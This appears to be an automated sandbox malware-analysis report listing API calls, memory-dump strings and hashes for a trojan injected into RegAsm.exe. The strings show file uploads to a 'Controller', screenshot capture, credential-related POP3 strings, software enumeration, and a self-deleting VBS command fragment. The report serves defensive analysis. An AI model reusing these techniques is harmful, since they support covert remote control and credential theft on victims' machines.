                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                      • API String ID: 1646373207-255920310
                                                                                                                                                                      • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                      • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                                                      • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                      • API String ID: 4218353326-3023110444
                                                                                                                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                                                      • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                                                      • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                      • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                                                                      • API String ID: 1579085052-2309681474
                                                                                                                                                                      • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                                                      • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                                                      • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                                                      • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                      • String ID: ?
                                                                                                                                                                      • API String ID: 3941738427-1684325040
                                                                                                                                                                      • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                      • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                                                      • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                      • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                      • API String ID: 4218353326-230879103
                                                                                                                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$EnvironmentVariable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1464849758-0
                                                                                                                                                                      • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                      • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                                                      • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                      • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnumOpen
                                                                                                                                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                      • API String ID: 1332880857-3714951968
                                                                                                                                                                      • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                      • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                                                      • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                                      • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                      • String ID: Close
                                                                                                                                                                      • API String ID: 1657328048-3535843008
                                                                                                                                                                      • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                                      • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$Info
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                                                      • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                      • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                                      • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                      • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                                      • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                                      • API String ID: 3086580692-2582957567
                                                                                                                                                                      • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                                                      • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                                                      • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                                                      • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                      • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                      • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                      • _free.LIBCMT ref: 10007D32
                                                                                                                                                                      • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                      • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                      • _free.LIBCMT ref: 10007D72
                                                                                                                                                                      • _free.LIBCMT ref: 10007D80
                                                                                                                                                                      • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                      • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                      • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                      • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                      • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                        • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                      • _free.LIBCMT ref: 0045137F
                                                                                                                                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                      • _free.LIBCMT ref: 004513A1
                                                                                                                                                                      • _free.LIBCMT ref: 004513B6
                                                                                                                                                                      • _free.LIBCMT ref: 004513C1
                                                                                                                                                                      • _free.LIBCMT ref: 004513E3
                                                                                                                                                                      • _free.LIBCMT ref: 004513F6
                                                                                                                                                                      • _free.LIBCMT ref: 00451404
                                                                                                                                                                      • _free.LIBCMT ref: 0045140F
                                                                                                                                                                      • _free.LIBCMT ref: 00451447
                                                                                                                                                                      • _free.LIBCMT ref: 0045144E
                                                                                                                                                                      • _free.LIBCMT ref: 0045146B
                                                                                                                                                                      • _free.LIBCMT ref: 00451483
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                      • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                      • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                                      • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                                      • API String ID: 489098229-1431523004
                                                                                                                                                                      • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                      • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                                                      • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                        • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                        • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                        • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                        • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                      • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                      • API String ID: 1913171305-3159800282
                                                                                                                                                                      • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                                                                                                                      • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                                                                                      • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
